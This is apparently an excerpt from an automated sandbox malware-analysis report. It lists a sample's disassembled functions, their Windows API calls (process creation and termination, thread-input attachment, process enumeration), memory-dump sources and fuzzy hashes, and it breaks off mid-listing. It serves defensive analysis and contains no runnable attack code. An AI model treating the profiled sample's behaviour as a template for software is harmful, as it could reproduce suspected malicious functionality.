                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 008E173C
                              • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,008E0778,?,00000001), ref: 008E1755
                              • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,008E0778,?,00000001), ref: 008E1767
                              • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,008E0778,?,00000001), ref: 008E17AC
                              • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,008E0778,?,00000001), ref: 008E17C1
                              • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,008E0778,?,00000001), ref: 008E17CC
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                              • String ID:
                              • API String ID: 2156557900-0
                              • Opcode ID: 51b3be7d0210f0a9288b65bba2ef7e7d46fa0a8040ec58abdcf23a8a7bb613ef
                              • Instruction ID: 426421599284a130d2acc78f2d87875ed43f7c7016fa45876e0ce0be6d3e9c67
                              • Opcode Fuzzy Hash: 51b3be7d0210f0a9288b65bba2ef7e7d46fa0a8040ec58abdcf23a8a7bb613ef
                              • Instruction Fuzzy Hash: 4431BF79628248BFEF21DF55DC88F69BBA9FB1BB55F104064F800C62A0DB709E449B60
                              Function 0088FBBD Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 264comCOMMON
                              Download Yara Rule
                              APIs
                              • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 0088FC06
                              • OleUninitialize.OLE32(?,00000000), ref: 0088FCA5
                              • UnregisterHotKey.USER32(?), ref: 0088FDFC
                              • DestroyWindow.USER32(?), ref: 008C4A00
                              • FreeLibrary.KERNEL32(?), ref: 008C4A65
                              • VirtualFree.KERNEL32(?,00000000,00008000), ref: 008C4A92
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                              • String ID: close all
                              • API String ID: 469580280-3243417748
                              • Opcode ID: 7ae07fc9281ef2917cd41d61c01720cc9bb9ee1ed5c4e9338acf661a7c5bf4fe
                              • Instruction ID: 32b644ddaacb9cfa1e14bcab72d02280ae8663c8f7d16ed2e5cfb75665fc9110
                              • Opcode Fuzzy Hash: 7ae07fc9281ef2917cd41d61c01720cc9bb9ee1ed5c4e9338acf661a7c5bf4fe
                              • Instruction Fuzzy Hash: 21A136347012228FCB28EB58C4A5F69B7A4FF05710F1452ADE90AEB262DB30ED56CF55
                              Function 008DA693 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON
                              Download Yara Rule
                              APIs
                              • EnumChildWindows.USER32(?,008DAA64), ref: 008DA9A2
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: ChildEnumWindows
                              • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                              • API String ID: 3555792229-1603158881
                              • Opcode ID: 85c4ef4f9c1ab88677f026c8512d7515fc1063ecc0c51742d67e3d6fc09e5a5c
                              • Instruction ID: 4e2dc925223ff7dd897ef04362fd6a0816411f6cc4c8ade22bb07fda97d70933
                              • Opcode Fuzzy Hash: 85c4ef4f9c1ab88677f026c8512d7515fc1063ecc0c51742d67e3d6fc09e5a5c
                              • Instruction Fuzzy Hash: 2F91A47150060AEADB1CDF64C491BE9FB75FF04304F608226E899E7741DF30AA59CB92
                              Function 00882E26 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON
                              Download Yara Rule
                              APIs
                              • SetWindowLongW.USER32(?,000000EB), ref: 00882EAE
                                • Part of subcall function 00881DB3: GetClientRect.USER32(?,?), ref: 00881DDC
                                • Part of subcall function 00881DB3: GetWindowRect.USER32(?,?), ref: 00881E1D
                                • Part of subcall function 00881DB3: ScreenToClient.USER32(?,?), ref: 00881E45
                              • GetDC.USER32 ref: 008BCF82
                              • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 008BCF95
                              • SelectObject.GDI32(00000000,00000000), ref: 008BCFA3
                              • SelectObject.GDI32(00000000,00000000), ref: 008BCFB8
                              • ReleaseDC.USER32(?,00000000), ref: 008BCFC0
                              • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 008BD04B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                              • String ID: U
                              • API String ID: 4009187628-3372436214
                              • Opcode ID: 25e35885164b8acff5075453ef88c2fd0111983dd7c1deb3ec2dfc2fd0592aa0
                              • Instruction ID: 555e702abba64fdd958d062918b729e51e61bb607a8663d9c17df22b1d660a8b
                              • Opcode Fuzzy Hash: 25e35885164b8acff5075453ef88c2fd0111983dd7c1deb3ec2dfc2fd0592aa0
                              • Instruction Fuzzy Hash: 8C71D431500209EFCF21AF64C884AFA7BB6FF49364F1442A9ED55DA3A6D7318C42DB61
                              Function 0090C27C Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00882612: GetWindowLongW.USER32(?,000000EB), ref: 00882623
                                • Part of subcall function 00882344: GetCursorPos.USER32(?), ref: 00882357
                                • Part of subcall function 00882344: ScreenToClient.USER32(009467B0,?), ref: 00882374
                                • Part of subcall function 00882344: GetAsyncKeyState.USER32(00000001), ref: 00882399
                                • Part of subcall function 00882344: GetAsyncKeyState.USER32(00000002), ref: 008823A7
                              • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 0090C2E4
                              • ImageList_EndDrag.COMCTL32 ref: 0090C2EA
                              • ReleaseCapture.USER32 ref: 0090C2F0
                              • SetWindowTextW.USER32(?,00000000), ref: 0090C39A
                              • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0090C3AD
                              • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 0090C48F
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                              • String ID: @GUI_DRAGFILE$@GUI_DROPID
                              • API String ID: 1924731296-2107944366
                              • Opcode ID: ada3741a11d93a94e60f1186f463264d332ba9b576c40aefeb0b99d19a3dc18b
                              • Instruction ID: f36fc1ad19be2ce0bf327de800fd1009fe703ccbdc32f9c0af9444594d04ebfe
                              • Opcode Fuzzy Hash: ada3741a11d93a94e60f1186f463264d332ba9b576c40aefeb0b99d19a3dc18b
                              • Instruction Fuzzy Hash: C751ABB4208304AFD714EF24CC95FAA7BE5FB89314F004A2DF5918B2E1DB71A948DB52
                              Function 008F8F5B Relevance: 13.9, APIs: 9, Instructions: 438COMMON
                              Download Yara Rule
                              APIs
                              • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0090F910), ref: 008F903D
                              • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0090F910), ref: 008F9071
                              • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 008F91EB
                              • SysFreeString.OLEAUT32(?), ref: 008F9215
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Free$FileLibraryModuleNamePathQueryStringType
                              • String ID:
                              • API String ID: 560350794-0
                              • Opcode ID: 58ee88d8407a2a83a6a068fca10ff56a1b483149c88feb58bbfb6dd333941b3f
                              • Instruction ID: 8cbbaeb880b6fdb66c3eb4c0ccf15aa064a5e2d58c154b1c9bfa6809ee1f9915
                              • Opcode Fuzzy Hash: 58ee88d8407a2a83a6a068fca10ff56a1b483149c88feb58bbfb6dd333941b3f
                              • Instruction Fuzzy Hash: A2F10671A00119EFDB14DFA8C888EBEB7B9FF89314F108059EA55EB251DB31AE45CB50
                              Function 008FF9A8 Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON
                              Download Yara Rule
                              APIs
                              • _memset.LIBCMT ref: 008FF9C9
                              • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 008FFB5C
                              • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 008FFB80
                              • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 008FFBC0
                              • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 008FFBE2
                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 008FFD5E
                              • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 008FFD90
                              • CloseHandle.KERNEL32(?), ref: 008FFDBF
                              • CloseHandle.KERNEL32(?), ref: 008FFE36
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                              • String ID:
                              • API String ID: 4090791747-0
                              • Opcode ID: a87f3bd02c255d9ca9a90728f6d86c1440f1c1d0f611c28cb87f571e1b22faa3
                              • Instruction ID: 4ff2c17ddddbda30a89cc207b64f6e8433998181c0376017c1d15e653009a2eb
                              • Opcode Fuzzy Hash: a87f3bd02c255d9ca9a90728f6d86c1440f1c1d0f611c28cb87f571e1b22faa3
                              • Instruction Fuzzy Hash: 07E191312042559FCB14EF38C891A6ABBE1FF85354F18856DFA99CB2A2DB31DC41CB52
                              Function 008E4F63 Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 008E48AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,008E38D3,?), ref: 008E48C7
                                • Part of subcall function 008E48AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,008E38D3,?), ref: 008E48E0
                                • Part of subcall function 008E4CD3: GetFileAttributesW.KERNEL32(?,008E3947), ref: 008E4CD4
                              • lstrcmpiW.KERNEL32(?,?), ref: 008E4FE2
                              • _wcscmp.LIBCMT ref: 008E4FFC
                              • MoveFileW.KERNEL32(?,?), ref: 008E5017
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                              • String ID:
                              • API String ID: 793581249-0
                              • Opcode ID: 5375424f642e7cc0123c7eee0bb3b20f9b11f4e3b352f3c55f2abf1fa5b6a7cf
                              • Instruction ID: b70286abeb82c2f988032d0a940e83a18681869320ee9efb10f77980f00c2a23
                              • Opcode Fuzzy Hash: 5375424f642e7cc0123c7eee0bb3b20f9b11f4e3b352f3c55f2abf1fa5b6a7cf
                              • Instruction Fuzzy Hash: EF5141B20087859BD624EB54C8919DFB3ECFF85344F10092EB689D3152EE74E6888767
                              Function 009088B4 Relevance: 13.7, APIs: 9, Instructions: 168COMMON
                              Download Yara Rule
                              APIs
                              • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0090896E
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: InvalidateRect
                              • String ID:
                              • API String ID: 634782764-0
                              • Opcode ID: 54d017595d0ebfa4ac478bef222c6074a371c23a5a381993640d64161ec8aada
                              • Instruction ID: 8928c0afb93bae5b76a8562079e8a31a41083fdd21fe686bfbf86b8c8d97f160
                              • Opcode Fuzzy Hash: 54d017595d0ebfa4ac478bef222c6074a371c23a5a381993640d64161ec8aada
                              • Instruction Fuzzy Hash: C9517230704208BFDF309F28CC85BAB7B69FB15320F604516F9A5E69E1DF75A9809B91
                              Function 00882B72 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON
                              Download Yara Rule
                              APIs
                              • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 008BC547
                              • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 008BC569
                              • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 008BC581
                              • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 008BC59F
                              • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 008BC5C0
                              • DestroyIcon.USER32(00000000), ref: 008BC5CF
                              • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 008BC5EC
                              • DestroyIcon.USER32(?), ref: 008BC5FB
                                • Part of subcall function 0090A71E: DeleteObject.GDI32(00000000), ref: 0090A757
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                              • String ID:
                              • API String ID: 2819616528-0
                              • Opcode ID: c500a4a3eb713fd93ac64d73bd5a8faef1fb28366539def2900a5d8865b51848
                              • Instruction ID: 85cdd4dfc8ccca560d753cf088310990478c0f0626a55106aefad21f162d9b04
                              • Opcode Fuzzy Hash: c500a4a3eb713fd93ac64d73bd5a8faef1fb28366539def2900a5d8865b51848
                              • Instruction Fuzzy Hash: E8514874A10209EFDB20EF24CC45FAA7BA5FB55724F104528F902D76A0DB70ED90EB51
                              Function 008D8E03 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,008D8A84,00000B00,?,?), ref: 008D8E0C
                              • HeapAlloc.KERNEL32(00000000,?,008D8A84,00000B00,?,?), ref: 008D8E13
                              • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,008D8A84,00000B00,?,?), ref: 008D8E28
                              • GetCurrentProcess.KERNEL32(?,00000000,?,008D8A84,00000B00,?,?), ref: 008D8E30
                              • DuplicateHandle.KERNEL32(00000000,?,008D8A84,00000B00,?,?), ref: 008D8E33
                              • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,008D8A84,00000B00,?,?), ref: 008D8E43
                              • GetCurrentProcess.KERNEL32(008D8A84,00000000,?,008D8A84,00000B00,?,?), ref: 008D8E4B
                              • DuplicateHandle.KERNEL32(00000000,?,008D8A84,00000B00,?,?), ref: 008D8E4E
                              • CreateThread.KERNEL32(00000000,00000000,008D8E74,00000000,00000000,00000000), ref: 008D8E68
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                              • String ID:
                              • API String ID: 1957940570-0
                              • Opcode ID: 8f99695bf1bece97e188ad31def5256ce936f58bf57bf452a7f037480cd2a0c3
                              • Instruction ID: 2a920765a0cb2ed228923aef83d78f23ee01ace7803b67c198981bb87230ede4
                              • Opcode Fuzzy Hash: 8f99695bf1bece97e188ad31def5256ce936f58bf57bf452a7f037480cd2a0c3
                              • Instruction Fuzzy Hash: 8201BF75254304FFE760EB65DC4DF573B6CEB89B11F004521FA05DB691CA749900DB20
                              Function 008F9428 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 263COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Variant$ClearInit$_memset
                              • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                              • API String ID: 2862541840-625585964
                              • Opcode ID: 9675946036feeebbef9b7fc8689095952e37c0440a6df4ea5168a749ef2c882e
                              • Instruction ID: 6f187a0ecc6c77e76b16e5f918243748bb28414a901a88e814902b765fb533e6
                              • Opcode Fuzzy Hash: 9675946036feeebbef9b7fc8689095952e37c0440a6df4ea5168a749ef2c882e
                              • Instruction Fuzzy Hash: 0991BC70A00219ABDF24DFA5C848FAEBBB8FF99714F108159F645EB290D7749941CFA0
                              Function 008F9A72 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 242COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 008D7652: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,008D758C,80070057,?,?,?,008D799D), ref: 008D766F
                                • Part of subcall function 008D7652: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,008D758C,80070057,?,?), ref: 008D768A
                                • Part of subcall function 008D7652: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,008D758C,80070057,?,?), ref: 008D7698
                                • Part of subcall function 008D7652: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,008D758C,80070057,?), ref: 008D76A8
                              • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 008F9B1B
                              • _memset.LIBCMT ref: 008F9B28
                              • _memset.LIBCMT ref: 008F9C6B
                              • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 008F9C97
                              • CoTaskMemFree.OLE32(?), ref: 008F9CA2
                              Strings
                              • NULL Pointer assignment, xrefs: 008F9CF0
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                              • String ID: NULL Pointer assignment
                              • API String ID: 1300414916-2785691316
                              • Opcode ID: 8502b24f5a888d34472584052d5a0b633200e40f4b856987ff0a9d50234ff0af
                              • Instruction ID: 8ee3cce477a990437f0781a391fc7d5464a13be111ddf3ede1131e7d30aa780d
                              • Opcode Fuzzy Hash: 8502b24f5a888d34472584052d5a0b633200e40f4b856987ff0a9d50234ff0af
                              • Instruction Fuzzy Hash: 2A911A7190022D9BDB10EFA5DC84ADEBBB9FF08710F204159F519E7251EB719A44CFA1
                              Function 00906FEF Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON
                              Download Yara Rule
                              APIs
                              • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00907093
                              • SendMessageW.USER32(?,00001036,00000000,?), ref: 009070A7
                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 009070C1
                              • _wcscat.LIBCMT ref: 0090711C
                              • SendMessageW.USER32(?,00001057,00000000,?), ref: 00907133
                              • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00907161
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: MessageSend$Window_wcscat
                              • String ID: SysListView32
                              • API String ID: 307300125-78025650
                              • Opcode ID: 608ea60312eb7e6470f1958ddf6cb6f9418f72e1f40b2534eadc6ca91c423d95
                              • Instruction ID: 47ecaec8856fb12bab78f5a25f61a613ab12aa9a4e0bdf2c0e72061c08e2142a
                              • Opcode Fuzzy Hash: 608ea60312eb7e6470f1958ddf6cb6f9418f72e1f40b2534eadc6ca91c423d95
                              • Instruction Fuzzy Hash: 95419171904308AFEB219FA4CC85BEEB7BCEF48364F10052AF544E71D1D672AD859B60
                              Function 008FEC47 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 008E3E91: CreateToolhelp32Snapshot.KERNEL32 ref: 008E3EB6
                                • Part of subcall function 008E3E91: Process32FirstW.KERNEL32(00000000,?), ref: 008E3EC4
                                • Part of subcall function 008E3E91: CloseHandle.KERNEL32(00000000), ref: 008E3F8E
                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 008FECB8
                              • GetLastError.KERNEL32 ref: 008FECCB
                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 008FECFA
                              • TerminateProcess.KERNEL32(00000000,00000000), ref: 008FED77
                              • GetLastError.KERNEL32(00000000), ref: 008FED82
                              • CloseHandle.KERNEL32(00000000), ref: 008FEDB7
